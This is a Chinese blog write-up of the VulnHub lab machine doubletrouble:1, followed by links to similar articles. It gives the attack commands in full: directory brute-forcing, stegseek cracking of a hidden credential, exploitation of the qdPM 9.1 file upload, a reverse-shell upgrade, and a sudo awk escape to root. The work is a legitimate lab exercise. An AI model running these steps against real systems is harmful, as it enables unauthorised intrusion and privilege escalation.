vulnhunb之doubletrouble:1

最新推荐文章于 2025-01-14 19:36:40 发布
最新推荐文章于 2025-01-14 19:36:40 发布
阅读量1.7k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: linux web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qwweggfe/article/details/120369515
本文记录了一次靶机渗透测试的过程,包括IP扫描、利用远程文件上传漏洞、隐写术破解及提权等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

由于这个靶机比较简单,所以我就直接写渗透过程了:

首先进行ip扫描

 于是打开网页进行查看

 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描

NVD - CVE-2020-7246

gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak

 于是我在/secret下发现一个图片

 其他目录没有发现其他漏洞,于是我认为这个图片是有隐写的

如何使用Stegseek破解经过Steghide隐写的数据 | 演道网

上面的网页是工具下载的地址,他是一个基于steghigh的一个快速扫描的工具

wget http://192.168.181.166/secret/doubletrouble.jpg

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt/rockyou.txt -xf output

 

 于是我查看你output

发现了一个用户名密码,于是我们进行登录

登录成功 ,于是我进行文件上传

首先在kali上开启http的服务·

python3 -m http.server 4444

 

进行文件上传

 文件上传成功

 运行shell并进行shell反弹

 查看当前的用户

python -c 'import pty; pty.spawn("/bin/bash")'

 

于是进行提权

先查看一个有没有可以提权的工具

但是好像没有,于是我使用

sudo -l

 

于是我查看提权的命令

https://gtfobins.github.io/gtfobins/awk/#sudo

sudo awk 'BEGIN {system("/bin/sh")}'

 于是获得了root权限

 

【Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 1181
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
Vulnhub——DOUBLETROUBLE: 1
weixin_46038704的博客
06-03 713
Vulnhub——DOUBLETROUBLE: 1
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 901
攻击机:192.168.100.128靶机:192.168.100.130。
[Vulnhub]doubletrouble: 1
qq_48749937的博客
02-21 4040
kali ip:192.168.56.105 靶机ip:192.168.56.106 扫描靶机开放端口:nmap -sS -p- 192.168.56.106 访问http服务,发现一个登录界面
【Vulnhub靶场】DOUBLETROUBLE: 1
DG_s1mple
03-14 706
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
两人在线游戏doubletrouble:使用html5和vim快捷键
JavaScript是"doubletrouble"游戏的主要开发语言之一,因此游戏的核心逻辑可能需要良好的JavaScript编程技能。 7. 项目启动与服务器运行: 在"doubletrouble"项目中,开发者需要先通过命令行克隆项目仓库,安装依赖...
Vulnhub项目:doubletrouble
Ays.Ie的博客
05-30 807
Vulnhub项目:doubletrouble
VulnHub doubletrouble
weixin_45682839的博客
10-11 485
涉及知识:端口服务探测、敏感目录收集、WEB信息搜集、框架漏洞利用、利用代码修改、图片隐写破解、linux本地提权、SQL注入等。
vulnhub之doubletrouble: 1
weixin_54431413的博客
06-05 2416
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
stegseek:世界上最快的Steghide饼干,每秒可读取数百万个密码
03-31
:high_voltage: Stegseek Stegseek是一种快如闪电的Steghide饼干,可用于从文件中提取隐藏数据。 它是作为原始steghide项目的一个分支而构建的,因此,它比其他饼干要快数千倍,并且可以在2秒钟内遍历整个rockyou.txt *。 Stegseek还可以用于在没有密码的情况下提取steghide元数据,该密码可以用于测试文件是否包含steghide数据。 * rockyou.txt是一个著名的密码列表,其中包含超过1400万个密码。 演示:随机的rockyou.txt密码(实时) 跳至“以获取一些原始数据。 :wrench: 安装 以下说明将引导您完成安装过程。 或者,您可以在Docker容器中运行Stegseek。 跳至以获取说明。 发行版 Linux 在Ubuntu和其他基于Debian的系统上,可以使用提供的.deb软件包进行安装: 下载最新的 使用sudo apt in
vulnhub靶场----DOUBLETROUBLE: 1
woshicainiao666的博客
02-22 704
隐写,爆破,awk提权
vulnhub-doubletrouble
weixin_50683638的博客
12-08 557
靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/ 网络模式:nat 攻击机kali(nat) 1,扫描靶机IP 2,扫描存活端口 3,目录扫描,查看有用的信息 sudo arp-scan -l扫描同网段的靶机ip nmap -P 1-65535 -A 192.168.6.13722,80端口 访问 dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads 访问,看到一张图片,查看图片下载下来
Vulnhub靶机:doubletrouble
qq_48904485的博客
01-06 1214
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:doubletrouble10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
vlunhub系列-dobletrouble靶机
hanjinming110的博客
03-02 381
vlunhub系列之dobletrouble靶机
vulnhub靶机:doubletrouble
waitagirl的博客
03-21 749
vulnhub靶机:doubletrouble
vulnhub:doubletrouble1靶机
qq_63283137的博客
10-03 249
根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码,尝试登录80端口http、22端口ssh。查看当前用户的sudo权限,发现可以sudo执行awk命令。是个管理员登录界面,使用burp弱口令爆破,无用。发现这个主题有个文件上传的命令执行漏洞,先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面,随手ssh爆破试试。尝试访问上面的目录,发现有个图片。发现有个ova镜像文件,下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。
vulnhub靶机--DoubleTrouble
最新发布
qq_63233616的博客
01-14 1121
之所以会叫DoubleTrouble,是因为靶机作者会在初始靶机中暗藏另外一个靶机。主要用到的知识点:图像隐写、qdPM9.1的RCE、awk提权、部分常用工具的使用。
vulnhub靶机 doubletrouble
weixin_46107179的博客
05-14 500
靶机下载地址:下载链接 主机发现 因为在同一网段,所以直接用arp-scan -l 扫描,得到靶机ip地址 信息搜集 通过nmap进行信息搜集,得到开放端口22,80,并且有一个标题为qdPM 打开网页进行80端口的查看,发现只是一个登录页面 从中我们可以得到信息是关于qdPM9.1(一款基于Web的开源项目管理工具),从网上可以搜索到相关的命令执行漏洞,我们通过kali里面的searchsploit搜索一下,结果有可以利用的exp 接下来,直接将其两个可远程执行代码的exp拷贝下来,发现这两个的e
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值